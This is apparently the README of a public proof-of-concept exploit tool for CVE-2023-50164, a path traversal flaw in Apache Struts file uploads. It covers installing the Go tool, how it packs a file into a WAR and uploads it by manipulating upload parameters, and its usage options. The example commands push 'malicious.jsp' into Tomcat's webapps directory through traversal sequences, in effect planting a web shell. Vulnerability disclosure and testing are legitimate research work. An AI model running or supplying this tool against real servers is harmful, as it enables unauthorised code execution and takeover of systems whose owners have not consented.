/cve-2023-50164-poc

Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")

Primary LanguageGoDo What The F*ck You Want To Public LicenseWTFPL

PoC for CVE-2023-50164
===

Install

  To install this tool you must have Go version at least 1.20 installed and configured.

  $ go install github.com/dwisiswant0/cve-2023-50164-poc@latest

  Alternatively, you can compile it by DIY:
  $ git clone http://github.com/dwisiswant0/cve-2023-50164-poc cve-2023-50164-poc/
  $ cd $_
  $ go build .

How it Works?

  This tool operates through a series of stages to execute the exploit.
  For instance, if your want to upload `/path/to/file-you-want-to-upload.txt` file, the tool proceeds as follows:

  1. It compresses the specified file into a WAR file, generating a `file-you-want-to-upload.war` in the
     OS-specific temporary directory. Thus, the tool assumes that the servlet context file path is
     `/file-you-want-to-upload/file-you-want-to-upload.txt`.

  2. It checks whether the servlet context file path already exists. If it does, the tool immediately returns an
     error.

  3. The tool attempts to upload the WAR file by manipulating file upload parameters.

  4. Subsequently, it double-checks the availability (status code 200) of the servlet context file path,
     indicating successful file upload.

Usage

    $ cve-2023-50164-poc -h

      PoC for CVE-2023-50164
      --
      coded by @dwisiswant0

    Usage:
      cve-2023-50164-poc -u <URL> -f <FILE> -p <PATH>

    Options:
      -u, --url <URL>             Specify the upload endpoint URL
      -f, --file <FILE>           Provide the payload file for uploading
      -t, --traverse-seq <N>      Generate traversal sequences N times (default: "0")
      -p, --path <PATH>           Specify the path to the accessible root directory
      -w, -win, --windows         Converts slash ("/") chars to Windows separator ("\")

    Example:
      cve-2023-50164-poc -u http://host/path/to/upload.action -f foo.txt -t 1 -p webapps
      cve-2023-50164-poc -u http://host/upload/upload.action -f malicious.jsp -t 2 -p /opt/tomcat/webapps

Notes

  1. `jar` bin should be present in your system's $PATH.
  
  2. The target path should be accessible root path, such as `/var/lib/jetty/webapps` for Jetty or
     `/opt/tomcat/webapps` for Apache Tomcat.
  
  3. The default traversal sequences is zero ("0"), you can enter traverse sequences manually for the
     `-p`/`--path` flag value, e.g. `/../webapps` or `/../../opt/tomcat/webapps`. The traversal sequences will
     differ for each servlet.

  4. The `-w`/`-win`/`--windows` flag is exclusively employed when the servlet operates on a Windows server.

Disclaimer

  Using this tool to attack targets without mutual consent is illegal. Users must follow local, state, and
  federal laws. The developer ("dwisiswant0"/"Dwi Siswanto") are NOT responsible for any damage caused by
  misuse of the tool.

License

  This tool is licensed under WTFPL v2 (DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE). See COPYING.